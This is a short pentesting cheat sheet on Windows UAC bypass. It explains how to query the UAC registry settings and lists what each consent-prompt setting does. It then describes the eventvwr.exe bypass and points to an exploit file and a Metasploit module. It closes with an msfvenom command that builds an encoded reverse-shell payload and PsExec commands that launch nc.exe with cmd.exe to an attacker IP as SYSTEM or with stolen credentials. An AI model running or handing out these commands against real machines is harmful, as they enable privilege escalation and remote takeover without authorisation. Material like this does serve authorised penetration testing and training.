UAC bypass

Check configuration

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System


  • ConsentPromptBehaviorAdmin: UAC configuration [0x0 - 0x5]

  • EnableLUA: UAC enabled [0x0 / 0x1]

  • PromptOnSecureDesktop: show screen prompt [0x0 / 0x1]





Elevate without prompting

Allows privileged accounts to perform an operation that requires elevation without requiring consent or credentials.


Prompt for credentials on the secure desktop

When an operation requires elevation of privilege, the user is prompted on the secure desktop to enter a privileged (ex: administrator) user name and password. If the user enters valid credentials, the operation continues with the user's highest available privilege.


Prompt for consent on the secure desktop

When an operation requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.


Prompt for credentials

When an operation requires elevation of privilege, the user is prompted to enter an administrator user name and password. If the user enters valid credentials, the operation continues with the applicable privilege.


Prompt for consent

When an operation requires elevation of privilege, the user is prompted to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.


Prompt for consent for non-Windows binaries (Default)

When an operation for a non-Microsoft application requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.

Eventvwr exploitation


  • Windows 7, 8.1, 10

  • PromptOnSecureDesktop == 5

  • eventvwr.exe must exist and have self-elevating privileges


Exploit scripts

  • C file. Don't forget to uncomment the strcat and GetCurrentDirectory commands and replace foobar.exe with your payload

  • exploit/windows/local/bypassuac_eventvwr Metasploit module


msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai > payload.exe

Create elevated reverse shell

PsExec64.exe -i -accepteula -d -s ".\nc.exe <ip> <port> -e cmd.exe"
PsExec64.exe \\<machine> -accepteula -u <machine>\<user> -p <pass> ".\nc.exe <ip> <port> -e cmd.exe"

Last updated